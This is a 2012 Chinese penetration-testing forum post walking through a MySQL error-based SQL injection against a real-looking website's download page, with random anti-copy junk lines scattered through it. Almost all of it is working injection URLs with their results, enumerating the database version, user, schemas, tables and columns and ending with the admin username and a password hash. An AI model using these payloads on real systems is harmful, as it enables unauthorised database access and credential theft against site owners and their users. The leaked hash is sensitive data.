中国网络渗透测试联盟
标题:
php+mysql高级爆错注入经测算有效
[打印本页]
作者:
admin
时间:
2012-9-13 17:52
标题:
php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
- W: x- i! T) B' i
. n, D8 t( X( W0 |
之前想找个测试 没想到这有 可以测试下做个记录而已
9 o. X4 U( u0 ~" I* t
6 L2 {1 S; i: J# K
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
; A% {+ O0 C( S4 ?0 E9 j; T9 _
2 X5 R1 T* L- X7 E, d: i. H$ s. r
/data0/htdocs/leqi_new/app/myapp.php
6 h6 O5 Q# ?3 R9 [+ `; {
$ p9 S( ?, L, V6 f) c
或者
/ x, x! }4 W# l B
; l9 }$ z' _2 _! Z* b
/**********version()**********/ 5.1.49-log
' b; e5 r# b/ \, G8 g t* A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( v# H, Z5 h0 L
1 Q: s+ Z4 r. S7 X V7 J4 F
/**********user()**********/
6 e R+ ~! n% K- j/ a, K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
2 m/ Y' y# u' i7 d5 U5 T' y
- E4 i( a; w0 g0 E0 ]
/**********database()**********/ leqi
) ^3 {% O6 z* }& c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ H& a u" e2 _( b& f, i
: H/ l- w; _* B7 F2 Y7 j
/**********limit依次递归爆库**********/
4 r1 ] S H& k% d6 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) C1 Y c' V% N# A- B
information_schema
, R7 a- X$ Q+ c2 k* ]9 ~0 q
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: d; C. ^( Y& u; T
leqi
3 G& e; ]# ], c# g& y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 X) } D1 i1 E9 v6 x
test
4 K- @7 q) }" b2 B
# b4 T* L5 M1 r t
/**********limit依次递归爆表名**********/
4 y4 [" G8 P# q5 a8 e2 N3 G+ U
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% V) \7 n6 m7 i5 q$ K4 m/ [# ~
users
! Z) x8 D; d6 K
4 N3 ] Z: Z* E' S2 L0 W, X
/**********limit依次递归爆字段名**********/
; k# u$ F& P7 ?: M" T6 s3 P
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 B& Q# C6 q+ d4 h) r
user_id,username,nickname,passwd,group_id
) _; G( Z4 d: f+ v# W8 N
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
" h( O8 F* E$ {4 f- t' A' L
/wapc/5000_0005_003
& t) j/ v5 U" D" d; V
11 21
9 m; u: S- [# {4 k3 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
" ~" y" r& x7 ^, s) ~
/wapc/5000_0005_003
) J- L3 v2 e* P9 q: I
11 341 351 361
& g9 e* p8 V8 u V T8 P
/**********爆数据**********/
2 |4 T8 B! J% H1 Q7 t. ?* Z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ {, ^7 i* r5 m! Q2 ` c
admin
6 K- Q/ T; S: U; y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
+ Q0 X3 A7 t# L8 m8 B
6a8b4574ca231eb8bd52764d4978ffcd
" W$ d1 T8 e; q" Z" `& o) _1 x
" S7 Z& r" m& k
+ I' B8 e% w! x; m9 m4 `; g: F& }9 I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2